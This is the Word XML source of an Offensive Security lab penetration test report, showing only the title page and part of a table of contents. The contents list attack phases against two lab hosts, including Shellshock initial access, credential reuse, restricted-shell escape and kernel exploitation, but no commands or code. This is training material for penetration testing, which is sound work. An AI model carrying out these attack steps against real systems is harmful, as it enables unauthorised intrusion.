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47C810AE" w:rsidR="004C32FD" w:rsidRDefault="00620F73">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Penetration Test Report</w:t>
      </w:r>
      <w:r w:rsidR="0093686D">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
          <w:u w:color="17375E"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
          <w:u w:color="17375E"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
          <w:u w:color="17375E"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="008E2D2A">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
          <w:u w:color="17375E"/>
        </w:rPr>
        <w:t>Internal Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2B7AF8" w14:textId="460D29D2"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050C58">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</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5A2B5F1"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r w:rsidR="00F715CC">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8"/>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0D6D36B9"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645BC2">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Offensive Security Ltd. All rights reserved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E9A991" w14:textId="1236CAC0" w:rsidR="00F23122"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5B0CED35" w14:textId="77777777" w:rsidR="00F23122" w:rsidRDefault="00F23122" w:rsidP="00D6306A">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sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Arial Unicode MS" w:hAnsiTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:id w:val="1143536106"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="22AF0A81" w14:textId="50DFA342" w:rsidR="008D0450" w:rsidRPr="00C25F6B" w:rsidRDefault="00FA2A58">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:rPr>
              <w:color w:val="000000" w:themeColor="text1"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00FA2A58">
            <w:rPr>
              <w:color w:val="000000" w:themeColor="text1"/>
            </w:rPr>
            <w:t xml:space="preserve">Table of </w:t>
          </w:r>
          <w:r w:rsidR="008D0450" w:rsidRPr="00C25F6B">
            <w:rPr>
              <w:color w:val="000000" w:themeColor="text1"/>
            </w:rPr>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="0D160C45" w14:textId="048E7DA3" w:rsidR="00CD5102" w:rsidRDefault="003A61DB">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:lang w:eastAsia="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="186B290E">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="008D0450">
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="186B290E">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc92471625" w:history="1">
            <w:r w:rsidR="00CD5102" w:rsidRPr="0083700F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Offensive Security Lab Penetration Test Report</w:t>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc92471625 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="21E15E88" w14:textId="1EF1E98B" w:rsidR="00CD5102" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:lang w:eastAsia="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc92471626" w:history="1">
            <w:r w:rsidR="00CD5102" w:rsidRPr="0083700F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1. Objective</w:t>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc92471626 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5DF438FF" w14:textId="21A929C2" w:rsidR="00CD5102" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:lang w:eastAsia="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc92471627" w:history="1">
            <w:r w:rsidR="00CD5102" w:rsidRPr="0083700F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2. Lab Network</w:t>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc92471627 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7D3B8907" w14:textId="268D0940" w:rsidR="00CD5102" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:lang w:eastAsia="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc92471628" w:history="1">
            <w:r w:rsidR="00CD5102" w:rsidRPr="0083700F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.11.1.71 – Alpha</w:t>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc92471628 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7004D9C3" w14:textId="2EC958A3" w:rsidR="00CD5102" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc92471629" w:history="1">
            <w:r w:rsidR="00CD5102" w:rsidRPr="0083700F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-ZA"/>
              </w:rPr>
              <w:t>Initial Access – Shellshock on Apache’s CGI</w:t>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc92471629 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0522F060" w14:textId="176FCF99" w:rsidR="00CD5102" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc92471630" w:history="1">
            <w:r w:rsidR="00CD5102" w:rsidRPr="0083700F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Privilege Escalation – Unsecured Credentials</w:t>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc92471630 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="286C40F5" w14:textId="7D4BB5FF" w:rsidR="00CD5102" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc92471631" w:history="1">
            <w:r w:rsidR="00CD5102" w:rsidRPr="0083700F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Post-Exploitation</w:t>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc92471631 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5C04C5AD" w14:textId="4A820611" w:rsidR="00CD5102" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:lang w:eastAsia="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc92471632" w:history="1">
            <w:r w:rsidR="00CD5102" w:rsidRPr="0083700F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.11.1.72 – Beta</w:t>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc92471632 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3E207369" w14:textId="46FFEAE6" w:rsidR="00CD5102" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc92471633" w:history="1">
            <w:r w:rsidR="00CD5102" w:rsidRPr="0083700F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-ZA"/>
              </w:rPr>
              <w:t>Initial Access – Unsecured Credentials</w:t>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc92471633 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7DF85CC1" w14:textId="46D599B9" w:rsidR="00CD5102" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc92471634" w:history="1">
            <w:r w:rsidR="00CD5102" w:rsidRPr="0083700F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Lateral Movement – Escaping a Restricted Shell</w:t>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc92471634 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3C0B619B" w14:textId="248A8739" w:rsidR="00CD5102" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc92471635" w:history="1">
            <w:r w:rsidR="00CD5102" w:rsidRPr="0083700F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Privilege Escalation – Kernel Exploitation</w:t>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc92471635 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1BAC5D24" w14:textId="0464BA87" w:rsidR="00CD5102" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc92471636" w:history="1">
            <w:r w:rsidR="00CD5102" w:rsidRPr="0083700F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Post-Exploitation</w:t>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc92471636 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3E7DDBC9" w14:textId="1F2F0C1C" w:rsidR="00CD5102" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:lang w:eastAsia="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc92471637" w:history="1">
            <w:r w:rsidR="00CD5102" w:rsidRPr="0083700F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3. Exercises</w:t>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
